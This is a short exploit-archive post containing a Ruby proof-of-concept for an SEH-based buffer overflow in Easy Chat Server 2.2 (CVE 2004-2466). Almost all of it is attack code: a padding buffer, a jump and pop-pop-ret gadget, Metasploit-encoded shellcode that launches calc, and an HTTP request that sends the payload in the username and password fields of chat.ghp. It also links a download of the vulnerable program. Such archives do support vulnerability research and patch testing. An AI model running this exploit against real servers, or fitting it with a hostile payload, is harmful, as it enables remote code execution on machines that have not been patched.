Easy Chat Server 2.2 Buffer Overflow

`  
  
# Title: Exploit EFS Software Easy Chat Server v2.2   
# EDB-ID:   
# CVE-ID: 2004-2466  
# OSVDB-ID: 7416  
# Author: John Babio  
# Published: 2010-01-17  
# Tested on: [Windows XP Sp3 Eng]  
# Download Exploit Code  
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)  
  
#!/usr/bin/ruby  
  
require 'net/http'  
require 'uri'  
require 'socket'  
  
  
jmp = "\xeb\x06\x90\x90"  
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret  
  
#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
  
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +  
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +  
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +  
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +  
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +  
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +  
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +  
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +  
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +  
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"   
  
buffer = "\x41" * 216 + jmp + ppr + shellcode  
  
url = URI.parse('http://10.10.99.12')  
res = Net::HTTP.start(url.host, url.port) {|http|  
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')  
}  
puts res.body  
  
  
  
  
  
`